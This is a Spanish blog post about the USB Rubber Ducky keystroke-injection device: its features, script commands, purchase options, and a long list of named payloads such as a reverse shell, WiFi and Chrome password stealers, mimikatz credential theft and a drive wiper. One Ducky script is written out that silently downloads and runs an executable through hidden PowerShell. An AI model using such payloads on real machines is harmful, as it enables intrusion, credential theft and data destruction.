Jugando con el USB Rubber Ducky

Hace una semana me llegó a casa mi nuevo USB Rubber Ducky y estos días he estado jugando un poco con él, a continuación os explicaré mis impresiones y os diré cosas que tener en cuenta a la hora de usarlo así como donde comprarlo y os liberaré unos cuantos payloads para poder hacer pruebas con él.

Este USB simula ser un teclado, así los PC's lo reconocerán como un dispositivo de confianza y así poder aplicar payloads sin ningún tipo de sospecha del ordenador en cuestión. Usa un lenguaje propio muy sencillo de comprender. Entre sus características encontramos:

  • Es exactamente igual que una unidad USB Flashdrive, lo que hace confiar al usuario a la hora de realizar la ingeniería social.
  • Viene con un lector de tarjetas SD para poder cargar los payloads.
  • Escribe 1000 palabras por segundo, lo que hará que en poco más de 6 segundos tengamos toda la información de un PC en el simple gesto de enchufar y desenchufar.
  • Viene con un LED que nos avisa si el Payload está bien configurado para funcionar o, por el contrario, tendremos que agregar más argumentos para hacerlo funcional.
  • Tiene un botón para cargar los Payloads por si con el simple gesto de enchufar y desenchufar no basta.

    • También es importante mencionar que viene con una tarjeta micro SD de 128 MB para poder cargar los payloads, tamaño más que suficiente si lo único que queremos es cargar la información del PC (siempre que no sea demasiado grande). En caso contrario deberíamos agregarle otra tarjeta de más tamaño.

    Su lenguaje, como he dicho, es muy sencillo. Con estos simples comandos podremos utilizarlo para lo que queramos:

  • DEFAULT_DELAY o DEFAULTDELAY: define los milisegundos que tardará en ejecutar las órdenes.
  • DELAY: igual que el anterior, pero personalizado.
  • STRING
  • Y por último, las keys especiales para cada sistema. Para ello deberemos conocer los comandos del terminal del sistema en cuestión.

    • Ejemplo de Payload para descargar y ejecutar un archivo:

    GUI R
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.Web.client).DownloadFile('http://example.com/bob.old',%TEMP%\bob.exe);Start-Process "%TEMP%\bob.exe"
ENTER

    Payloads disponibles:

  • Payload – Hello World
  • Payload – WiFi password grabber
  • Payload – Basic Terminal Commands Ubuntu
  • Payload – Information Gathering Ubuntu
  • Payload – Hide CMD Window
  • Payload – Netcat-FTP-download-and-reverse-shell
  • Payload – Wallpaper Prank
  • Payload – YOU GOT QUACKED!
  • Payload – Reverse Shell
  • Payload – Fork Bomb
  • Payload – Utilman Exploit
  • Payload – WiFi Backdoor
  • Payload – Non-Malicious Auto Defacer
  • Payload – Lock Your Computer Message
  • Payload – Ducky Downloader
  • Payload – Ducky Phisher
  • Payload – FTP Download / Upload
  • Payload – Restart Prank
  • Payload – Silly Mouse, Windows is for Kids
  • Payload – Windows Screen rotation hack
  • Payload – Powershell Wget + Execute
  • Payload – mimikatz payload
  • Payload – MobileTabs
  • Payload – Create Wireless Network Association (AUTO CONNECT) PINEAPPLE
  • Payload – Retrieve SAM and SYSTEM from a live file system
  • Payload – Ugly Rolled Prank
  • Payload – XMAS
  • Payload – Pineapple Assocation (VERY FAST)
  • Payload – WiFun v1.1
  • Payload – MissDirection
  • Payload – Remotely Possible
  • Payload – Batch Wiper/Drive Eraser
  • Payload – Generic Batch
  • Payload – Paint Hack
  • Payload – Local DNS Poisoning
  • Payload – Deny Net Access
  • Payload – RunEXE from SD
  • Payload – Run Java from SD
  • Payload – OSX Root Backdoor
  • Payload – OSX User Backdoor
  • Payload – OSX Local DNS Poisoning
  • Payload – OSX Youtube Blaster
  • Payload – OSX Photo Booth Prank
  • Payload – OSX Internet Protocol Slurp
  • Payload – OSX Ascii Prank
  • Payload – OSX iMessage Capture
  • Payload – OSX Grab Minecraft Account Password and upload to FTP
  • Payload – OS X Wget and Execute
  • Payload – OSX Passwordless SSH access (ssh keys)
  • Payload – MrGray’s Rubber Hacks
  • Payload – Copy File to Desktop
  • Payload – Youtube Roll
  • Payload – Disable AVG 2012
  • Payload – Disable AVG 2013
  • Payload – EICAR AV test
  • Payload – Download mimikatz, grab passwords and email them via gmail
  • Payload – Hotdog Wallpaper
  • Payload – Android 5.x Lockscreen
  • Payload – Chrome Password Stealer

    • Dónde comprar un USB Rubber Ducky

  • Comprar original en Hak5
  • Montarlo tú mismo por 3$

    • ---

    Fuentes

  • http://picateshackz.com/2016/02/list-of-top-rubber-ducky-usb-payloads.html